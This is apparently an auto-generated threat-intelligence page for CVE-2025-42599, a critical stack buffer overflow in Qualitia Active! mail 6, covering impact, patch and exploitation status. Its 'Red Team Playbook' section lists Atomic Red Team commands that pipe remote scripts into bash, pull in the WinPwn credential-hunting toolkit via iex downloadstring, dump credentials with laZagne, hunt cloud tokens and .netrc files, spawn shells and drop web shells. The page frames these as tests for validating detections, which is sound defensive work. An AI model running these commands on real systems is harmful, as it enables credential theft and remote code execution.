CVE-2025-42599
Overview
The vulnerability is a stack-based buffer overflow in QUALITIA CO., LTD. Active! mail 6, specifically in BuildInfo versions 6.60.05008561 and earlier. The root cause lies in improper bounds checking when processing incoming requests, allowing excessive data to overwrite stack memory. This flaw affects the request handling component of the Active! mail 6 server, enabling memory corruption through crafted input.
Vulnerability Description
Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffer overflow vulnerability. Receiving a specially crafted request created and sent by a remote unauthenticated attacker may lead to arbitrary code execution and/or a denial-of-service (DoS) condition.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the affected server or cause a denial-of-service condition by crashing the application. No user interaction or credentials are required to trigger the flaw. Successful exploitation may result in full system compromise, unauthorized access to sensitive mail data, or disruption of mail services, impacting business continuity and data confidentiality.
Solution
QUALITIA CO., LTD. has released an update addressing this vulnerability in Active! mail 6 version 6.60.05008562 and later. Administrators should apply this patch promptly. Detailed patch instructions and advisory information are available at https://www.qualitia.com/jp/news/2025/04/18_1030.html. No alternative workarounds are recommended; updating to the fixed version is the prescribed remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Active! mail versions 6 BuildInfo: 6.60.05008561 and earlier is characterized by a stack-based buffer overflow. This type of vulnerability occurs when a program writes more data to a buffer located on the stack than it can hold, leading to adjacent memory locations being overwritten. In this case, the flaw allows an attacker to send a specially crafted request that can manipulate the program's execution flow. By exploiting this vulnerability, an attacker can execute arbitrary code on the affected system, potentially gaining unauthorized access or control over the server. The severity of this issue is underscored by its high CVSS score of 9.8, indicating a critical risk to systems utilizing this email management software.
Attack vectors for this vulnerability are particularly concerning due to the requirement for no authentication. An unauthenticated attacker can leverage this flaw remotely, making it accessible to a wide range of potential threat actors. The exploitation process typically involves crafting a malicious request that exceeds the buffer size, which can lead to the execution of arbitrary code. Scenarios may include sending a specially formatted email or HTTP request that triggers the overflow, allowing the attacker to execute their code in the context of the affected application. This could result in a complete takeover of the email server, enabling the attacker to manipulate email communications, exfiltrate sensitive data, or deploy additional malware within the network.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely on Active! mail for their email communications. A successful exploitation could lead to a denial-of-service condition, rendering the email service inoperable and disrupting business operations. Furthermore, the potential for arbitrary code execution poses a significant business risk, as it could allow attackers to access confidential information, compromise user accounts, or launch further attacks within the organization's infrastructure. The reputational damage from such incidents can also be severe, as customers and partners may lose trust in an organization that fails to protect their data adequately.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching software is crucial, as it ensures that known vulnerabilities are addressed promptly. In this case, upgrading to a version of Active! mail that is not affected by this vulnerability is essential. Additionally, employing intrusion detection systems (IDS) can help identify and alert on suspicious activity that may indicate an attempted exploitation of the vulnerability. Network segmentation and strict access controls can further limit the potential impact of an attack, as they restrict the ability of an attacker to move laterally within the network.
In conclusion, the stack-based buffer overflow vulnerability in Active! mail presents a critical risk that organizations must address proactively. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against such threats. Implementing robust detection and mitigation strategies will not only protect against this specific vulnerability but also enhance the overall security posture of the organization, safeguarding sensitive information and maintaining operational integrity.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-42599, rising by over 200% within a short timeframe. This surge reflects a growing likelihood that threat actors may attempt to exploit the stack-based buffer overflow vulnerability in Active! mail 6. Although no new exploit code or ransomware group associations have been detected, the inclusion of this vulnerability in the KEV catalog underscores its elevated priority for defenders. The heightened EPSS score, now approaching the 0.92nd percentile, signals that exploitation attempts could become more frequent or impactful, warranting increased vigilance. While the 7-day trend shows a slight decrease, the overall risk posture has shifted to a more critical level due to the amplified probability of exploitation, emphasizing the need for continuous monitoring and rapid response capabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qualitia | Active\! Mail | All |
cpe:2.3:a:qualitia:active\!_mail:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-42599 |
| qualitia.com |
GitHub CVE
|
https://www.qualitia.com/jp/news/2025/04/18_1030.html |
| jvn.jp |
GitHub CVE
|
https://jvn.jp/en/jp/JVN22348866/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42599 |